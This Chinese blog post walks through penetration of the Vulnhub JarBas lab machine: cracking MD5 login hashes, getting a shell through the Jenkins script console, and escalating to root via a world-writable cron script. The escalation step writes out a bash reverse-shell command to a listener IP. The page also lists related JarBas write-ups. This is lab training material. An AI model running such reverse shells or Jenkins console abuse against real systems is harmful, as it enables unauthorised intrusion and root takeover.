Vulnhub_JarBas靶机渗透测试

最新推荐文章于 2024-09-26 22:16:03 发布
最新推荐文章于 2024-09-26 22:16:03 发布
阅读量128 收藏
点赞数 1
分类专栏: Vulnhub渗透测试靶场 文章标签: 网络安全 web安全 笔记 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/132912485
版权
文章描述了一次针对JarBas靶场的渗透过程,从信息收集、web渗透(包括破解登录凭证、jenkins漏洞利用)到权限提升(利用定时任务获取root权限),详细展示了getshell的利用方法和靶机总结。
摘要由CSDN通过智能技术生成

JarBas靶场

内置jenkins管理系统框架

信息收集

  1. 通过使用nmap扫描内网网段,确定靶机ip为192.168.78.160,开放22,80,3306,8080端口。优先级在前的肯定还是web网站,先对80和8080网站进行查看

  3. 对80端口网页进行目录扫描,发现存在access.html文件

  4. 访问发现8080端口是一个jenkins内容管理系统框架,而且是登录界面

image-20230720182853347

web渗透
  1. 访问目录扫描到的access.html文件,发现三行内容,很容易想到这就是登录使用的账号和被md5加密的密码

image-20230720183050983

  1. 使用md5解密工具,对加密内容进行解密获取账号密码

image-20230720183253182

image-20230720183300640

  1. 经过测试发现eder账户可以成功登录到后台

image-20230720183356128

  1. 通过在网上寻找jenkins后台getshell了解到,该框架存在未授权访问漏洞,可以获取shell

(81条消息) Jenkins未授权访问漏洞复现与 getshell 利用方法汇总_jenkins漏洞利用_W小哥1的博客-CSDN博客

image-20230720183505325

  1. 点击系统管理,找到脚本命令行功能,可以在此执行命令。执行命令下载远程服务器的反弹shell的php文件,下载到/tmp文件夹下

image-20230720183916034

  1. 使用命令执行/tmp/2.php文件,提前在kali主机进行监听

image-20230720184147108

  1. 来到kali界面,发现成功获取了shell

image-20230720184226034

权限提升
  1. 尝试进行suid和sudo -l信息查看,发现没有可以利用的提权信息。在不先考虑内核漏洞和系统漏洞前提下,查看一下是否存在定时任务

image-20230720184409149

  1. 查看定时任务文件,发现真存在一个每五分钟使用root权限执行的一个脚本文件

image-20230720184412121

  1. 查看一下该脚本的内容,然后在查看一下脚本的权限,发现是777权限,证明说用户都可以对其进行读写执行权限

image-20230720184636156

image-20230720184648944

  1. 直接对该脚本文件写入反弹shell的命令,等待执行监听即可echo "/bin/bash -i >& /dev/tcp/192.168.78.145/7778 0>&1" >> 文件名

image-20230720184758256

  1. 五分钟内成功接受到了反弹shell,返回root权限用户

image-20230720184957730

  1. 直接来到root目录下查看flag

image-20230720185016973

渗透流程

​ 使用nmap扫描得到了80和8080端口开放,22端口优先级不如web,所以先进行web渗透,通过目录扫描得到了可用于8080端口网站登录的账号密码的网页,成功登陆之后,发现是jenkins框架,寻找一下历史漏洞,发现可以利用的未授权访问漏洞可以getshell,根据所给步骤成功获取了shell,常见的靶机提权无非就是sudo -l,suid和定时任务了,本次使用的提权是很简单的定时任务提权,只需要写入反弹shell的命令即可等待监听获取root权限的shell

靶机总结
  1. 本次靶机学习到了关于jenkins框架的未授权访问漏洞getshell的操作步骤,善于搜索对应的cms漏洞是很多web渗透的成功前提
  2. 本次提权又使用到了定时任务提权,也是依旧简单给的很明显,只需要写入反弹shell命令即可
生而逢时
关注
专栏目录
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 854
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
jarbas 靶机渗透(cms 渗透)
m0_63416413的博客
08-29 832
nmap主机发现,扫端口,漏洞脚本扫描发现80端口部署了jakins发现8080端口似乎是一个管理端登录窗口爆破80端口的目录,指定后缀为html,php找到几个账号和密码,在线md5解密,尝试登录后台使用jakins的特性,创建 item 时可写 shell 或 batch, 配合之前的nmap扫描可知服务器为linux系统,故写入 shell 脚本kali 监听4444 端口,build 这个 item 拿到一个 shell,这个shell为 /bash/false ,应当提权。
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 354
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
[vulnhub] Jarbas-Jenkins
weixin_46099552的博客
09-21 1090
Vulnhub
Vulnhub靶机系列:Jarbas1.0
汗的博客
04-26 822
这次的靶机vulnhub靶机Jarbas1.0,因为合天有在线靶机,就直接用合天的在线靶机了。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/jarbas-1,232/ If you want to keep your hacking studies, please try out...
红队打靶:JARBAS详细打靶思路(vulnhub
Bossfrank的博客
06-03 1979
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
打靶:vulnhub中的JARBAS
qq_73865998的博客
04-08 915
复现视频:【「红队笔记靶机精讲:JARBAS - Jenkins渗透原理详解,一个典型CMS渗透测试样本。
渗透靶场之Jarbas
m0_56190544的博客
07-09 563
完整的解析了vulnhub靶场中的Jarbas的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
小白渗透之旅——Jarbas靶场(急速版)
qq_52849046的博客
05-30 751
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅供学习,切勿用于实战。容易被gangan
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
《PyPI上的jarbas_hive_mind-0.3.5.tar.gz:探索Hadoop大数据世界的工具》 PyPI(Python Package Index)是Python开发者的重要资源库,它为全球的Python程序员提供了丰富的软件包和模块。在PyPI上,我们可以找到名...
渗透测试-Jarbas靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 1297
Jarbas靶机渗透1.环境部署2.信息收集3.开始测试80端口8080端口4.提权 1.环境部署 靶机下载地址:点此下载(建议使用迅雷下载) 攻击机:Kali 2019.2 amd64 靶机 : Jarbas靶机 目标:拿下靶机root权限和里面的flag 2.信息收集 使用arp-scan -l进行局域网主机发现 192.168.0.100这个地址是靶机地址 使用nmap进行端口扫描 目录...
解决Vulnhub下载的靶机导入VMware后NAT模式无法自动获取IP地址
qq_45722813的博客
11-15 2973
解决Vulnhub下载的靶机导入VMware后NAT模式无法自动获取IP地址 重新启动靶机虚拟机,在启动时按下【shift】键,然后按下【e】进入配置界面,进行相关配置 将ro修改为rw singie init=/bin/bash,然后按Ctrl+X或者【F10】启动虚拟机 开机进入命令行,输入ifconfig查看IP地址,发现什么都没有,这是因为虚拟机网卡没有启用,从而不会分配IP地址,连主机的回环地址127.0.0.1都没有 所以我们需要先输入命令ifconfig -a查看网卡 使用命令vim /
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8481
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全详解
weidl001的博客
09-21 1537
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
2401_84434570的博客
09-26 897
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
网络安全全方略
AI逍遥子
09-25 1328
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
19、网络安全合规复盘
最新发布
weixin_43263566的博客
09-26 215
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 638
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
网络安全】Drupal之缓存中毒+储存型XSS
等风来
09-23 431
缓存系统通常会基于唯一键(如URL和查询参数的组合)来区分不同的请求和响应。即使你请求的是相同的资源,如果URL中的参数不同,服务器可能会为不同的参数创建不同的缓存条目。例如,GET /page?param=123和GET /page?param=456会被视为不同的请求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值